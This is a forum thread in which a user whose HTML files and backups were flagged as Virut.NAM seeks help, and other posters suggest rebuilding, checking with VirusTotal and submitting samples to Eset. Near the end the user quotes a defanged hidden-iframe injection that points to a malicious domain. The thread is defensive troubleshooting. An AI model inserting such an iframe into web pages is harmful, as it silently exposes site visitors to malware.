Virut.NAM [solved] Hi there, Posted in a couple of other threads about this, but see after a search there is not any information and started a new thread. I found this last night and after a complete Nod32 scan it seems like it wants to delete 13728 html files... I rebooted into a PE shell and the files looked OK, so assumed they could be cleaned. Installed Kaspersky this morning which has gone through and disinfected the files, and reports that all is well... Nod32 however is now reporting that there are still 10000+ infected files. Kaspersky says it is all OK.... So, I am at a loss what to do... I've only seen two references on this, one the same as me, but a restore fixed him ok. The other was a mention on how this virus 'slipped under the Nod32 radar'. I have ten years plus work backed up to removable disks, and ghost images, of which it appears they are all infected... Any help would be much appreciated. Mark
Hi there, the Virut family of viruses uses polymorphism to hide from all antivirus protection, it infects executable files. File infection makes it very hard to repair a system that has been infected. I would strongly recommend rebuilding the system from backups. Windows can be rebuilt as described in the following link: http://www.informationweek.com/showArticle.jhtml?articleID=189400897 or failing this a format of the system will be required. Cheers
But I don't understand...the only thing that has been affected is html files? My system is OK, I have a backup of that at various stages, it is just my data. Basically every html file on my disk is being flagged as a virus... Can I submit one of these files to Eset? Every backup I have of my 'data' has got these flagged changed files.
Virut is very nasty. I have seen it to modify a lot of files into malware. Did u try to upload some of these files to joti of virus total to see what other AVs say about them.
This is on a Vista Ultimate installation with Nod32, Spybot S&D, Ad-Aware etc. The system is always clean, as I restore the ghost image, install MS updates, and AV definitions, then backup again.
I just run the scanner and it come up with this result http://www.virustotal.com/resultado.html?422cf328112982c1ad39b8ba079b4f76
There is nothing wrong with windows, it is a clean install that has been restored from a ghost image. It is my data that needs to be recovered...these are already corrupt. I couldn't care less about windows, its retrieval of my html files that are paramount...
You can use this link http://www.eset.com/threat-center/up/submit.htm to upload file to Eset for testing, it may just be a false positive your seeing but better that the developers get to look at the file. Jon
Sent some files to Eset... Just to clarify the above, Kaspersky only fixed about 3000 of the 13000 reported threats. I did run Bittdefender as well, but that only pulled out a handful as well. Of all the products I have tried, Nod32 is actually reporting the most infections, so in all honesty it probably is the better product. Its just a shame it did not detect it at source when it arrived.... I have had a bullet proof system for years now, and it is a real pain this happening. I guess having it bullet proof has meant that I have become complacent with regular scans etc. Saying that though it would not have made any difference if it was already infected. Can anyone elaborate on the 'went under the radar comment'? Sounds like it was some time before this was added to the definitions list... Thanks everyone for your help. Have sent some more files to Eset....hopefully they will come up with something, or will have to start seeing what I have backed up to DVD.... It appears backing up to removable disks is not such a good idea after all! Shame I don't have a spare 3592 drive knocking around LOL! Mark
Just had a reply from the very helpful Dan @ Eset. He says that this appends the following to html files... <iframe src="hxxp://ntkrnlpa.info/cr/?i=1" width=1 height=1></iframe> Replacing the xx with tt of course! After checking my files, it is indeed this. I have asked if there is a simple fix to this, but its looking good...! Mark
Dan gave me this link to search/replace....worked like a charm! http://www.rjlsoftware.com/software/utility/search/download.shtml
Hi Mark, I am new to this forum, please excuse my ignorance. I have the same problem with the iframe you mentioned, being inserted into all the html, asp and php files. After you have performed the search/replace on all the affected htm, asp and php files, did it completely resolve your problem. Ossie